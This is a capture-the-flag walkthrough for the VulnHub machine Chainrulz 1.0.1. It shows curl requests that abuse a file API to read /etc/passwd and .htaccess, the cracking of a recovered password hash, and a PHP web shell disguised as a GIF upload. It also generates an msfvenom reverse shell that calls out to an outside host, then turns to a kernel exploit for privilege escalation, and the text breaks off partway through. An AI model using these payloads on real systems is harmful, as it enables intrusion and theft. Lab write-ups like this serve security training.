Chainrulz: 1.0.1 is a vulnerable machine hosted on VulnHub and was created by Askar for “Jordan’s top hacker 2018 CTF” competition. It tells the story of Frank, a web developer, who loves to follow patterns. It’s quite an enjoyable box, that requires a few tricks and some strong enumeration skills to complete.
PORT STATE SERVICE REASON 21/tcp open ftp syn-ack ttl 52 22/tcp open ssh syn-ack ttl 52 80/tcp open http syn-ack ttl 52 554/tcp open rtsp syn-ack ttl 64 7070/tcp open realserver syn-ack ttl 64 8011/tcp open unknown syn-ack ttl 52
We have a fair few ports open, we have anonymous access to FTP however no files available. Let’s try the website instead:
We have a pretty simple website, let’s try bruteforcing directories:
/index (Status: 200) [Size: 334] /img (Status: 301) [Size: 320] [--> http://ctf23.root-me.org/img/] /css (Status: 301) [Size: 320] [--> http://ctf23.root-me.org/css/] /development (Status: 401) [Size: 484] /js (Status: 301) [Size: 319] [--> http://ctf23.root-me.org/js/] /vendor (Status: 301) [Size: 323] [--> http://ctf23.root-me.org/vendor/] /robots (Status: 200) [Size: 21] /LICENSE (Status: 200) [Size: 1093]
We have a few here that look interesting such as
/development however this page requires authenticate for us to access it. Let’s try a different port:
The files API looks interesting, we can make request specific files using the file= parameter:
curl -s -d "file=/etc/passwd" "ctf23.root-me.org:8011/api/files_api.php"
There’s only a couple users on this box, root and frank. We can try access the development page, there’s likely a htaccess file that prevents us from accessing it, let’s try grabbing it:
curl -s -d "file=/var/www/development/.htaccess" "ctf23.root-me.org:8011/api/files_api.php"
We get the following:
<head> <title>franks website | simple website browser API</title> </head> AuthUserFile /etc/.htpasswd AuthName "Frank Development Area" AuthType Basic AuthGroupFile /dev/null <Limit GET POST> require valid-user </Limit>
We can grab htpasswd too and crack it’s hash:
It cracks to
frank!!. Using these creds we can sign into
/development and see there’s an unfinished project:
We can try find a directory related to an uploader tool and see if we can attempt to upload a malicious file. We can find this at
We unfortunately are limited to just image files but we can try create a php payload with a the magic bytes as gif and .gif file extension to see if it executes:
GIF89a; <?php echo shell_exec($_GET['c']); ?>
We get the following message:
File is an image - image/gif.The file cmd.php.gif has been uploaded to my uploads path.
We don’t actually know where this goes to. We can guess some file paths, for example “my” could refer to frank. Using this I guessed it was FRANKuploads:
We can execute this directly but if we back track a little bit, we know we can access this directory using the file API back on port 8011. Let’s try it:
We have full access to frank’s home directory so we can grab the user flag:
Let’s grab ourselves a shell. We’ll start by generating one:
msfvenom -p linux/x64/shell_reverse_tcp LHOST=18.104.22.168 LPORT=4443 -f elf -o rev.elf
We then use wget to get this onto our target box, change permissions to allow execution and run it. We instantly get a reverse shell:
Priv esc is pretty easy, we type “uname -a” and immediately see that the kernel is extremely old:
Linux ubuntu 2.6.35-19-generic #28-Ubuntu SMP Sun Aug 29 06:34:38 UTC 2010 x86_64 GNU/Linux
We can use an old exploit for this:
We can compile this on our target but we run into a slight issue:
After a little digging on the box we find that cc1 is actually on the box however not in our current path, let’s add it: